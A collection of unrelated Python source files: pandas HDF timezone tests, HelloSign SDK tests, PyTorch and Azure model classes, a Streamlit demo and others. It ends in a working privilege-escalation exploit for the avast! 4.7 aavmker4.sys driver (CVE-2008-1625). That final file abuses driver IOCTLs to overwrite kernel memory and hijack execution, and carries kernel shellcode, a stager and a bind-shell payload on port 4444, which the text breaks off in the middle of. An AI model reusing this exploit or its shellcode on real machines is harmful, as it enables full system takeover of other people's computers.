store.append('df_tz', df, data_columns=['A', 'B'])
result = store['df_tz']
self._compare_with_tz(result, df)
assert_frame_equal(result, df)
# can't append with diff timezone
df = DataFrame(dict(A=Timestamp('20130102', tz='US/Eastern'),
B=Timestamp('20130102', tz='CET')),
index=range(5))
pytest.raises(ValueError, store.append, 'df_tz', df)
# as index
with ensure_clean_store(self.path) as store:
# GH 4098 example
df = DataFrame(dict(A=Series(lrange(3), index=date_range(
'2000-1-1', periods=3, freq='H', tz='US/Eastern'))))
_maybe_remove(store, 'df')
store.put('df', df)
result = store.select('df')
assert_frame_equal(result, df)
_maybe_remove(store, 'df')
store.append('df', df)
result = store.select('df')
assert_frame_equal(result, df)
def test_tseries_select_index_column(self):
# GH7777
# selecting a UTC datetimeindex column did
# not preserve UTC tzinfo set before storing
# check that no tz still works
rng = date_range('1/1/2000', '1/30/2000')
frame = DataFrame(np.random.randn(len(rng), 4), index=rng)
with ensure_clean_store(self.path) as store:
store.append('frame', frame)
result = store.select_column('frame', 'index')
assert rng.tz == DatetimeIndex(result.values).tz
# check utc
rng = date_range('1/1/2000', '1/30/2000', tz='UTC')
frame = DataFrame(np.random.randn(len(rng), 4), index=rng)
with ensure_clean_store(self.path) as store:
store.append('frame', frame)
result = store.select_column('frame', 'index')
assert rng.tz == result.dt.tz
# double check non-utc
rng = date_range('1/1/2000', '1/30/2000', tz='US/Eastern')
frame = DataFrame(np.random.randn(len(rng), 4), index=rng)
with ensure_clean_store(self.path) as store:
store.append('frame', frame)
result = store.select_column('frame', 'index')
assert rng.tz == result.dt.tz
def test_timezones_fixed(self):
with ensure_clean_store(self.path) as store:
# index
rng = date_range('1/1/2000', '1/30/2000', tz='US/Eastern')
df = DataFrame(np.random.randn(len(rng), 4), index=rng)
store['df'] = df
result = store['df']
assert_frame_equal(result, df)
# as data
# GH11411
_maybe_remove(store, 'df')
df = DataFrame({'A': rng,
'B': rng.tz_convert('UTC').tz_localize(None),
'C': rng.tz_convert('CET'),
'D': range(len(rng))}, index=rng)
store['df'] = df
result = store['df']
assert_frame_equal(result, df)
def test_fixed_offset_tz(self):
rng = date_range('1/1/2000 00:00:00-07:00', '1/30/2000 00:00:00-07:00')
frame = DataFrame(np.random.randn(len(rng), 4), index=rng)
with ensure_clean_store(self.path) as store:
store['frame'] = frame
recons = store['frame']
tm.assert_index_equal(recons.index, rng)
assert rng.tz == recons.index.tz
@td.skip_if_windows
def test_store_timezone(self):
# GH2852
# issue storing datetime.date with a timezone as it resets when read
# back in a new timezone
# original method
with ensure_clean_store(self.path) as store:
today = datetime.date(2013, 9, 10)
df = DataFrame([1, 2, 3], index=[today, today, today])
store['obj1'] = df
result = store['obj1']
assert_frame_equal(result, df)
# with tz setting
with ensure_clean_store(self.path) as store:
with set_timezone('EST5EDT'):
today = datetime.date(2013, 9, 10)
df = DataFrame([1, 2, 3], index=[today, today, today])
store['obj1'] = df
with set_timezone('CST6CDT'):
result = store['obj1']
assert_frame_equal(result, df)
def test_legacy_datetimetz_object(self):
# legacy from < 0.17.0
# 8260
expected = DataFrame(dict(A=Timestamp('20130102', tz='US/Eastern'),
B=Timestamp('20130603', tz='CET')),
index=range(5))
with ensure_clean_store(
tm.get_data_path('legacy_hdf/datetimetz_object.h5'),
mode='r') as store:
result = store['df']
assert_frame_equal(result, expected)
def test_dst_transitions(self):
# make sure we are not failing on transaitions
with ensure_clean_store(self.path) as store:
times = pd.date_range("2013-10-26 23:00", "2013-10-27 01:00",
tz="Europe/London",
freq="H",
ambiguous='infer')
for i in [times, times + pd.Timedelta('10min')]:
_maybe_remove(store, 'df')
df = DataFrame({'A': range(len(i)), 'B': i}, index=i)
store.append('df', df)
result = store.select('df')
assert_frame_equal(result, df)
|
py | b40351504fcc97e1b1515a029431041b8ad53447 | from hellosign_sdk.tests.functional_tests import BaseTestCase
from hellosign_sdk.resource import UnclaimedDraft
from hellosign_sdk.utils import HSException
import os
#
# The MIT License (MIT)
#
# Copyright (C) 2014 hellosign.com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
class TestUnclaimedDraft(BaseTestCase):
def test_unclaimed_draft(self):
''' Test creating an unclaimed draft '''
files = [os.path.dirname(os.path.realpath(__file__)) + "/docs/nda.pdf"]
signers = [{"name": "Signer Name", "email_address": "[email protected]"}]
cc_email_addresses = ["[email protected]"]
draft_type = UnclaimedDraft.UNCLAIMED_DRAFT_REQUEST_SIGNATURE_TYPE
metadata = {
'account_id': '123',
'company_name': 'Acme Co.'
}
try:
self.client.create_unclaimed_draft(
test_mode=True,
files=[],
file_urls=[],
draft_type=draft_type,
subject="Test unclaimed draft",
message="Please do not reply to the messages",
signers=signers,
cc_email_addresses=cc_email_addresses)
self.fail('Validation error expected')
except HSException:
pass
result = self.client.create_unclaimed_draft(
test_mode=True,
files=files,
file_urls=[],
draft_type=draft_type,
subject="Test unclaimed draft",
message="Please do not reply to the messages",
signers=signers,
cc_email_addresses=cc_email_addresses,
metadata=metadata,
allow_decline=True)
self.assertEqual(isinstance(result, UnclaimedDraft), True)
def test_embedded_unclaimed_draft(self):
''' Test creating an embedded unclaimed draft '''
files = [os.path.dirname(os.path.realpath(__file__)) + "/docs/nda.pdf"]
signers = [{"name": "Signer Name", "email_address": "[email protected]"}]
cc_email_addresses = ["[email protected]"]
draft_type = UnclaimedDraft.UNCLAIMED_DRAFT_REQUEST_SIGNATURE_TYPE
metadata = {
'account_id': '123',
'company_name': 'Acme Co.'
}
try:
# Missing required parameter
# test_mode=False, client_id=None, is_for_embedded_signing=False, requester_email_address=None, files=None, file_urls=None, draft_type=None,
# subject=None, message=None, signers=None, cc_email_addresses=None, signing_redirect_url=None, requesting_redirect_url=None, form_fields_per_document=None
self.client.create_embedded_unclaimed_draft(
test_mode=True,
client_id=self.client_id,
is_for_embedded_signing=True,
requester_email_address="[email protected]",
files=[],
file_urls=[],
draft_type=draft_type,
subject="Test unclaimed draft",
message="Please do not reply to the messages",
signers=signers,
cc_email_addresses=cc_email_addresses)
self.fail('Validation error expected')
except HSException:
pass
result = self.client.create_embedded_unclaimed_draft(
test_mode=True,
client_id=self.client_id,
is_for_embedded_signing=True,
requester_email_address="[email protected]",
files=files,
file_urls=[],
draft_type=draft_type,
subject="Test unclaimed draft",
message="Please do not reply to the messages",
signers=signers,
cc_email_addresses=cc_email_addresses,
metadata=metadata,
allow_decline=False)
self.assertEqual(isinstance(result, UnclaimedDraft), True)
def test_create_embedded_unclaimed_draft_with_template(self):
''' Test creating an embedded unclaimed draft from a template '''
signers = [{
"name": "Signer Name",
"email_address": "[email protected]",
"role_name": "Signer"
}]
metadata = {
'account_id': '123',
'company_name': 'Acme Co.'
}
template = self._get_one_template()
template_id = template.template_id
try:
# Missing required parameter
self.client.create_embedded_unclaimed_draft_with_template(
test_mode=True,
client_id=self.client_id,
is_for_embedded_signing=True,
#missing - template_id
requester_email_address='[email protected]',
title='MyDraft',
subject='Unclaimed Draft Email Subject',
message='Email Message',
signers=signers,
signing_redirect_url='http://url.com',
requesting_redirect_url='http://url.com',
metadata=metadata)
self.fail('Validation error expected')
except HSException:
pass
returned = self.client.create_embedded_unclaimed_draft_with_template(
test_mode=True,
client_id=self.client_id,
is_for_embedded_signing=True,
template_id=template_id,
requester_email_address='[email protected]',
title='MyDraft',
subject='Unclaimed Draft Email Subject',
message='Email Message',
signers=signers,
signing_redirect_url='http://url.com',
requesting_redirect_url='http://url.com',
metadata=metadata,
allow_decline=False)
self.assertEqual(isinstance(returned, UnclaimedDraft), True)
def _get_one_template(self, exclude=None):
''' Get one template from the current account '''
template_list = self.client.get_template_list()
if not template_list or len(template_list) == 0:
self.fail('CREATE A TEMPLATE BEFORE RUNNING THIS TEST')
if exclude is None:
return template_list[0]
else:
for t in template_list:
if t.template_id != exclude.template_id:
return t
self.fail('CREATE A SECOND TEMPLATE BEFORE RUNNING THIS TEST')
|
py | b40351db2d163dfc05a2f87586829f2c87f2d6f1 | # ############################################################################
#
# Copyright (c) Microsoft Corporation.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# [email protected]. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
# ###########################################################################
import sys
import PythonScraper
try:
# disable error reporting in our process, bad extension modules can crash us, and we don't
# want a bunch of Watson boxes popping up...
import ctypes
ctypes.windll.kernel32.SetErrorMode(3) # SEM_FAILCRITICALERRORS / SEM_NOGPFAULTERRORBOX
except:
pass
# Scrapes the file and saves the analysis to the specified filename, exits w/ nonzero exit code if anything goes wrong.
# Usage: ExtensionScraper.py scrape [mod_name or '-'] [mod_path or '-'] [output_path]
if len(sys.argv) != 5 or sys.argv[1].lower() != 'scrape':
raise ValueError('Expects "ExtensionScraper.py scrape [mod_name|'-'] [mod_path|'-'] [output_path]"')
mod_name, mod_path, output_path = sys.argv[2:]
module = None
if mod_name and mod_name != '-':
remove_sys_path_0 = False
try:
if mod_path and mod_path != '-':
import os.path
if os.path.exists(mod_path):
sys.path.insert(0, mod_path)
remove_sys_path_0 = True
__import__(mod_name)
module = sys.modules[mod_name]
finally:
if remove_sys_path_0:
del sys.path[0]
if not module:
print('__import__("' + mod_name + '")')
PythonScraper.write_analysis(output_path, {"members": {}, "doc": "Could not import compiled module"})
elif mod_path and mod_path != '-':
try:
import os.path
mod_name = os.path.split(mod_path)[1].partition('.')[0]
try:
import importlib
module = importlib.import_module(mod_name)
except ImportError:
# Don't really care which import failed - we'll try imp
pass
if not module:
import imp
module = imp.load_dynamic(mod_name, mod_path)
finally:
if not module:
print('imp.load_dynamic("' + mod_name + '", "' + mod_path + '")')
PythonScraper.write_analysis(output_path, {"members": {}, "doc": "Could not import compiled module", "filename": mod_path})
else:
raise ValueError('No module name or path provided')
if module:
analysis = PythonScraper.generate_module(module)
PythonScraper.write_analysis(output_path, analysis)
|
py | b403535e179420599ec1e2408c1898f8134d192b | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2022 Valory AG
# Copyright 2018-2021 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the common types and interfaces used in the aea framework."""
import os
from pathlib import Path
from typing import Any, Dict, List, Optional, Union
Address = str
Primitive = Union[str, int, bool, float]
_JSONDict = Dict[Any, Any] # temporary placeholder
_JSONList = List[Any] # temporary placeholder
_JSONType = Optional[Union[Primitive, _JSONDict, _JSONList]]
JSONLike = Dict[str, _JSONType]
PathLike = Union[os.PathLike, Path, str]
|
py | b40353e66d80eccc848d359f7f82e63c44bae1e3 | """ Unit test for the AWS lib """
import json
from unittest.mock import patch
import voithos.lib.config
import voithos.lib.aws.aws as aws
@patch("voithos.lib.config.system")
def test_get_aws_iam(mock_system):
""" get_aws_iam returns a dict with id and secret """
config = voithos.lib.config.DEFAULT_CONFIG
config["license"] = "11111111111111111111-2222222222222222222222222222222222222222"
mock_system.get_file_contents.return_value = json.dumps(config)
iam = aws.get_aws_iam()
assert "id" in iam
assert "secret" in iam
assert isinstance(iam, dict)
|
py | b403544b58b5219d2b12b894ea5c669a93f36954 | # Copyright (C) 2007 Frederic Back ([email protected])
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330,
# Boston, MA 02111-1307, USA.
import gtk
import gobject
from parser_cstyle import Token, CStyleCodeParser
import re
e = r".*?" # anything, but *not greedy*
e+= "(?:(private|protected) +)?" # visibility
e+= "function +(\w+)(\(.*\))" # function declaration
e+= " *\{$" # the tail
RE_FUNCTION = re.compile(e)
RE_CLASS = re.compile(r".*class +(\w+)(?: +extends +(\w+))? *\{$")
class PHPParser( CStyleCodeParser ):
def __init__(self):
pass
def getTokenFromChunk(self, chunk):
if chunk.find("function")>-1 or chunk.find("class")>-1:
# third step: perform regular expression to get a token
match = re.match(RE_FUNCTION,chunk)
if match:
t = Token("function")
t.visibility, t.name, t.params = match.groups()
#print match.groups()
return t
else:
match = re.match(RE_CLASS,chunk)
if match:
t = Token("class")
t.name, t.params = match.groups()
return t
else:
# last step: alert user if a chunk could not be parsed
#print "Could not resolve PHP function or class in the following string:"
#print chunk
pass
return None
|
py | b403544fd06f23234fca5a1e5a99db6d6f5b1ae7 | __author__ = "xTrinch"
__email__ = "[email protected]"
__version__ = "0.3.2"
class NotificationError(Exception):
pass
default_app_config = 'fcm_django.apps.FcmDjangoConfig'
|
py | b4035520074b12c1d760e163ef8a9de9c6e45527 | from typing import *
from onlinejudge_template.generator._utils import get_analyzed
def is_topcoder(data: Dict[str, Any]) -> bool:
definition = get_analyzed(data).topcoder_class_definition
return definition is not None
def class_name(data: Dict[str, Any]) -> str:
definition = get_analyzed(data).topcoder_class_definition
if definition is None:
return 'theClassName'
return definition.class_name
def method_name(data: Dict[str, Any]) -> str:
definition = get_analyzed(data).topcoder_class_definition
if definition is None:
return 'theMethodName'
return definition.method_name
|
py | b40356005b7a0329261c8d3e5831e0248321c3ed | import streamlit as st
#st.title("The code")
md = """
Doing all work by hand is wasteful. Let's put everything in vectors and use python libraries!
```python
true_condition = [0, 0, 0, 1, 0, 0, 1, 1, 1, 0]
pred_condition = [0, 0, 1, 0, 0, 1, 0, 0, 1, 0]
```
As you can see, the person `i` was predicted `pred_condition[i]`
but in reality we obtained `true_condition[i]`.
We can automate the counting process with the following code:
```python
from sklearn.metrics import confusion_matrix
CM = confusion_matrix(true_condition, pred_condition)
```
Obtaining:
"""
st.markdown(md, unsafe_allow_html=True)
true_condition = [0, 0, 0, 1, 0, 0, 1, 1, 1, 0]
pred_condition = [0, 0, 1, 0, 0, 1, 0, 0, 1, 0]
from sklearn.metrics import confusion_matrix
CM = confusion_matrix(true_condition, pred_condition)
st.write(CM)
md = """
Sometimes people unwrap the values as follows
```python
from sklearn.metrics import confusion_matrix
TN, FP, FN, TP = confusion_matrix(true_condition, pred_condition).ravel()
```
So we obtain:
"""
st.markdown(md, unsafe_allow_html=True)
from sklearn.metrics import confusion_matrix
TN, FP, FN, TP = confusion_matrix(true_condition, pred_condition).ravel()
st.code(f"True Negatives, TN = {TN} \nFalse Positives, FP = {FP}\nFalse Negatives, FN = {FN}\nTrue Positives, TP = {TP}") |
py | b4035696eb863d3c0db871e1b1f476143dd86d80 | # Copyright 2017 Canonical Ltd.
# Licensed under the LGPLv3, see LICENCE file for details.
class DischargeRequiredError(Exception):
''' Raised by checker when authorization has failed and a discharged
macaroon might fix it.
A caller should grant the user the ability to authorize by minting a
macaroon associated with Ops (see MacaroonStore.MacaroonIdInfo for
how the associated operations are retrieved) and adding Caveats. If
the user succeeds in discharging the caveats, the authorization will
be granted.
'''
def __init__(self, msg, ops, cavs):
'''
:param msg: holds some reason why the authorization was denied.
:param ops: holds all the operations that were not authorized.
If ops contains a single LOGIN_OP member, the macaroon
should be treated as an login token. Login tokens (also
known as authentication macaroons) usually have a longer
life span than other macaroons.
:param cavs: holds the caveats that must be added to macaroons that
authorize the above operations.
'''
super(DischargeRequiredError, self).__init__(msg)
self._ops = ops
self._cavs = cavs
def ops(self):
return self._ops
def cavs(self):
return self._cavs
class PermissionDenied(Exception):
'''Raised from AuthChecker when permission has been denied.
'''
pass
class CaveatNotRecognizedError(Exception):
'''Containing the cause of errors returned from caveat checkers when the
caveat was not recognized.
'''
pass
class VerificationError(Exception):
'''Raised to signify that an error is because of a verification failure
rather than because verification could not be done.'''
pass
class AuthInitError(Exception):
'''Raised if AuthChecker cannot be initialized properly.'''
pass
class IdentityError(Exception):
''' Raised from IdentityClient.declared_identity when an error occurs.
'''
pass
class ThirdPartyCaveatCheckFailed(Exception):
''' Raised from ThirdPartyCaveatChecker.check_third_party when check fails.
'''
pass
class ThirdPartyInfoNotFound(Exception):
''' Raised from implementation of ThirdPartyLocator.third_party_info when
the info cannot be found.
'''
pass
|
py | b403570558a6eb6dffd5f0fe78ef33fdc34e9f38 | from abc import ABC
from abc import abstractmethod
from typing import List
from typing import Optional
from typing import TypeVar
from typing import no_type_check
import torch
from torch import Tensor
T = TypeVar("T", bound="BaseInstrument")
class BaseInstrument(ABC):
"""Base class for all financial instruments."""
cost: float
@property
@abstractmethod
def spot(self) -> Tensor:
"""Returns the spot price of self."""
@abstractmethod
@no_type_check
def simulate(self, n_paths: int, time_horizon: float, **kwargs) -> None:
"""Simulate time series associated with the instrument itself
(for a primary instrument) or its underlier (for a derivative)
and add them as buffers.
Args:
n_paths (int): The number of paths to simulate.
time_horizon (float): The period of time to simulate the price.
Returns:
None
"""
@abstractmethod
def to(self: T, *args, **kwargs) -> T:
"""Moves and/or casts the buffers of the instrument.
This can be called as
.. function:: to(device=None, dtype=None)
.. function:: to(tensor)
.. function:: to(instrument)
Its signature is similar to :meth:`torch.nn.Module.to`.
It only accepts floating point dtypes.
See :ref:`instrument-attributes-doc` for details.
Note:
This method modifies the instrument in-place.
.. seealso::
- :meth:`float()`: Cast to :class:`torch.float32`.
- :meth:`double()`: Cast to :class:`torch.float64`.
- :meth:`half()`: Cast to :class:`torch.float16`.
- :meth:`bfloat16()`: Cast to :class:`torch.bfloat16`.
- :meth:`cuda()`: Move to CUDA memory.
- :meth:`cpu()`: Move to CPU memory.
Args:
dtype (torch.dtype): The desired floating point dtype of
the buffers in this instrument.
device (torch.device): The desired device of
the buffers in this instrument.
tensor (torch.Tensor): Tensor whose dtype and device are
the desired dtype and device of
the buffers in this instrument.
instrument (BaseInstrument): Instrument whose dtype and device are
the desired dtype and device of
the buffers in this instrument.
Returns:
self
"""
def cpu(self: T) -> T:
"""Moves all buffers of this instrument and its underlier to the CPU.
Note:
This method modifies the instrument in-place.
Returns:
self
"""
return self.to(torch.device("cpu"))
def cuda(self: T, device: Optional[int] = None) -> T:
"""Moves all buffers of this instrument and its underlier to the GPU.
Note:
This method modifies the instrument in-place.
Args:
device (int, optional): If specified,
all buffers will be copied to that device.
Returns:
self
"""
return self.to(torch.device(f"cuda:{device}" if device is not None else "cuda"))
def double(self: T) -> T:
"""Casts all floating point parameters and buffers to
``torch.float64`` datatype.
Note:
This method modifies the instrument in-place.
Returns:
self
"""
return self.to(torch.float64)
def float(self: T) -> T:
"""Casts all floating point parameters and buffers to
``torch.float32`` datatype.
Note:
This method modifies the instrument in-place.
Returns:
self
"""
return self.to(torch.float32)
def half(self: T) -> T:
"""Casts all floating point parameters and buffers to
``torch.float16`` datatype.
Note:
This method modifies the instrument in-place.
Returns:
self
"""
return self.to(torch.float16)
def bfloat16(self: T) -> T:
"""Casts all floating point parameters and buffers to
``torch.bfloat16`` datatype.
Note:
This method modifies the instrument in-place.
Returns:
self
"""
return self.to(torch.bfloat16)
def extra_repr(self) -> str:
"""Set the extra representation of the instrument.
To print customized extra information,
you should re-implement this method in your own instruments.
Both single-line and multi-line strings are acceptable.
"""
return ""
def _get_name(self) -> str:
return self.__class__.__name__
def _dinfo(self) -> List[str]:
# Returns list of strings that tell ``dtype`` and ``device`` of self.
# Intended to be used in :func:`__repr__`.
# If ``dtype`` (``device``) is the one specified in default type,
# ``dinfo`` will not have the information of it.
# Implementation here refers to the function _str_intern in
# pytorch/_tensor_str.py.
dinfo = []
dtype = getattr(self, "dtype", None)
if dtype is not None:
if dtype != torch.get_default_dtype():
dinfo.append("dtype=" + str(dtype))
# A general logic here is we only print device when it doesn't match
# the device specified in default tensor type.
device = getattr(self, "device", None)
if device is not None:
if device.type != torch._C._get_default_device() or (
device.type == "cuda" and torch.cuda.current_device() != device.index
):
dinfo.append("device='" + str(device) + "'")
return dinfo
class Instrument(BaseInstrument):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
raise DeprecationWarning(
"Instrument is deprecated. Use BaseInstrument instead."
)
|
py | b40357bbea84ed347aecb4c2b9f30879988a488b | __all__ = ["handler"]
import json
import os
import boto3
from ssm_ps_demo import logger
try:
_STORE_FN_ARN = os.environ["STORE_FN_ARN"]
except KeyError:
logger.exception("Store function ARN is required.")
def handler(*_) -> None:
"""Call the store function to get parameter values."""
client = boto3.client("lambda")
invoke_response = client.invoke(
FunctionName=_STORE_FN_ARN,
InvocationType="RequestResponse",
Payload=json.dumps(["DB_HOST", "DB_PORT"]),
)
payload = invoke_response["Payload"]
raw = payload.read()
decoded = raw.decode("utf-8")
parameters = json.loads(decoded)
logger.info("Parameters: {}".format(json.dumps(parameters)))
|
py | b40358189d7a59fe4851ad26406ed0d7f01be229 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class Operation(Model):
"""Network REST API operation definition.
:param name: Operation name: {provider}/{resource}/{operation}
:type name: str
:param display: Display metadata associated with the operation.
:type display: ~azure.mgmt.network.v2018_10_01.models.OperationDisplay
:param origin: Origin of the operation.
:type origin: str
:param service_specification: Specification of the service.
:type service_specification:
~azure.mgmt.network.v2018_10_01.models.OperationPropertiesFormatServiceSpecification
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display': {'key': 'display', 'type': 'OperationDisplay'},
'origin': {'key': 'origin', 'type': 'str'},
'service_specification': {'key': 'properties.serviceSpecification', 'type': 'OperationPropertiesFormatServiceSpecification'},
}
def __init__(self, **kwargs):
super(Operation, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.display = kwargs.get('display', None)
self.origin = kwargs.get('origin', None)
self.service_specification = kwargs.get('service_specification', None)
|
py | b40359a0a31e0d8cba26d7129e52d00fb090aef4 | import numpy as np
from .mass import kg
from .length import m
from .time_units import s
from .electromagnetic import C
# SI
mJ, J, kJ = np.logspace(-3, 3, 3) * (kg * m ** 2 / s ** 2)
eV = 1.602176634e-19 * C
meV = 1e-3 * eV
keV, MeV, GeV, TeV = eV * np.logspace(3, 12, 4)
|
py | b4035a22db265103a1aff95c487cfd0a683f3d79 | #!/usr/bin/python
# avast! 4.7 aavmker4.sys privilege escalation
# http://www.trapkit.de/advisories/TKADV2008-002.txt
# CVE-2008-1625
# Tested on WindXpSp2/Sp3 Dep ON
# Matteo Memelli ryujin __A-T__ offensive-security.com
# www.offensive-security.com
# Spaghetti & Pwnsauce - 17/04/2010
# Tested on WinXPSP2/SP3 english | avast! 4.7.1098.0
from ctypes import *
import time, struct, sys, thread, os
kernel32 = windll.kernel32
Psapi = windll.Psapi
def findSysBase(drv):
print "(+) Retrieving %s base address..." % drv
ARRAY_SIZE = 1024
myarray = c_ulong * ARRAY_SIZE
lpImageBase = myarray()
cb = c_int(1024)
lpcbNeeded = c_long()
drivername_size = c_long()
drivername_size.value = 48
Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
for baseaddy in lpImageBase:
drivername = c_char_p("\x00"*drivername_size.value)
if baseaddy:
Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername,
drivername_size.value)
if drivername.value.lower() == drv:
print "(+) Address retrieved: %s" % hex(baseaddy)
return baseaddy
return None
def checkShell():
check = "netstat -an | find \"4444\""
res = os.popen(check)
ret = res.read()
res.close()
if ret.find("0.0.0.0:4444") != -1:
return True
else:
return False
def kickLsass():
time.sleep(10)
lsas1 = "echo hola | runas /user:administrator cmd.exe > NUL"
lsas2 = "net use \\\\127.0.0.1 /user:administrator test > NUL"
nc = "nc 127.0.0.1 4444"
print "(!) NO BSOD? good sign :)"
print "(*) Sleeping 60 secs before the Woshi finger hold..."
time.sleep(60)
# Trying to kick ls-ass, any auth good or failed should help
# if this doesn't work for you try to rdp to the vuln box or
# logout/login from console... it's rough but should work ;)
print "(+) Trying to fail an auth to trigger syscall..."
os.system(lsas1)
time.sleep(1)
os.system(lsas2)
while 1:
res = checkShell()
if res:
print "($) Shell is ready 0.0.0.0:4444"
#os.system(nc)
#print "(-) netcat not in path but shell is open!"
break
print "(*) Retrying. Sleeping 30 secs..."
time.sleep(30)
print "(+) Trying to fail an auth to trigger syscall..."
os.system(lsas1)
time.sleep(1)
os.system(lsas2)
def pwnDrv(driver_handle2, IOCTL_EIP, stor_input, stor_size, stor_output,
out_size, dwReturn1):
# We trigger func pointer to control EIP
time.sleep(5)
print "(+) Owning EIP..."
for i in range(1,3):
print "(+) Triggering function pointer: %d/2" % i
dev_ioctl = kernel32.DeviceIoControl(driver_handle2, IOCTL_EIP, stor_input,
stor_size, stor_output, out_size,
byref(dwReturn1), None)
time.sleep(0.5)
if __name__ == '__main__':
print "(*) avast! 4.7 aavmker4.sys privilege escalation"
print "(+) coded by Matteo Memelli aka ryujin -> at <- offsec.com"
print "(+) www.offsec.com || Spaghetti & Pwnsauce"
print "(+) tested on WinXPSP2/SP3 DEP On 17/04/2010"
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
CREATE_ALWAYS = 0x2
IOCTL_STOR = 0xb2d6001c # stores stuff to bypass checks in .data
IOCTL_VULN = 0xb2d60030 # writes to arbitrary memory
IOCTL_EIP = 0xb2d60020 # triggers function pointer to own EIP
# DosDevices\AAVMKER4 Device\AavmKer4
DEVICE_NAME = "\\\\.\\AavmKer4"
dwReturn1 = c_ulong()
dwReturn2 = c_ulong()
evil_size = 0x878
out_size = 0x1024
stor_size = 0x418
evil_output = ""
stor_output = ""
driver_name = 'aavmker4.sys'
# evil_input = 0x878
# Payload = 496 bytes
# ring0_migrate = 45 bytes || # \xf0\x01 bytes to copy
ring0_migrate = (
"\xfc\xfa\xeb\x24\x5e\x68\x76\x01\x00\x00\x59\x0f\x32\x89\x86\x69"
"\x00\x00\x00\x8b\xbe\x6d\x00\x00\x00\x89\xf8\x0f\x30\xb9\xf0\x01"
"\x00\x00\xf3\xa4\xfb\xf4\xeb\xfd\xe8\xd7\xff\xff\xff" )
# ring0_msr = 117 bytes
ring0_msr = (
"\x6a\x00\x9c\x60\xe8\x00\x00\x00\x00\x58\x8b\x98\x60\x00\x00\x00"
"\x89\x5c\x24\x24\x81\xf9\xde\xc0\xad\xde\x75\x10\x68\x76\x01\x00"
"\x00\x59\x89\xd8\x31\xd2\x0f\x30\x31\xc0\xeb\x3a\x8b\x32\x0f\xb6"
"\x1e\x66\x81\xfb\xc3\x00\x75\x2e\x8b\x98\x68\x00\x00\x00\x8d\x9b"
"\x75\x00\x00\x00\x89\x1a\xb8\x01\x00\x00\x80\x0f\xa2\x81\xe2\x00"
"\x00\x10\x00\x74\x11\xba\x00\xff\x3f\xc0\x81\xc2\x04\x00\x00\x00"
"\x81\x22\xff\xff\xff\x7f\x61\x9d\xc3\xff\xff\xff\xff\x00\x04\xdf"
"\xff\x00\x04\xfe\x7f" )
# ring3_stager = 61 bytes
ring3_stager = (
"\x60\x6a\x30\x58\x99\x64\x8b\x18\x39\x53\x0c\x74\x2e\x8b\x43\x10"
"\x8b\x40\x3c\x83\xc0\x28\x8b\x08\x03\x48\x03\x81\xf9\x6c\x61\x73"
"\x73\x75\x18\xe8\x0a\x00\x00\x00\xe8\x10\x00\x00\x00\xe9\x09\x00"
"\x00\x00\xb9\xde\xc0\xad\xde\x89\xe2\x0f\x34\x61\xc3" )
# msf payload: bindshell port 4444 318 bytes
ring3_shellcode = (
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
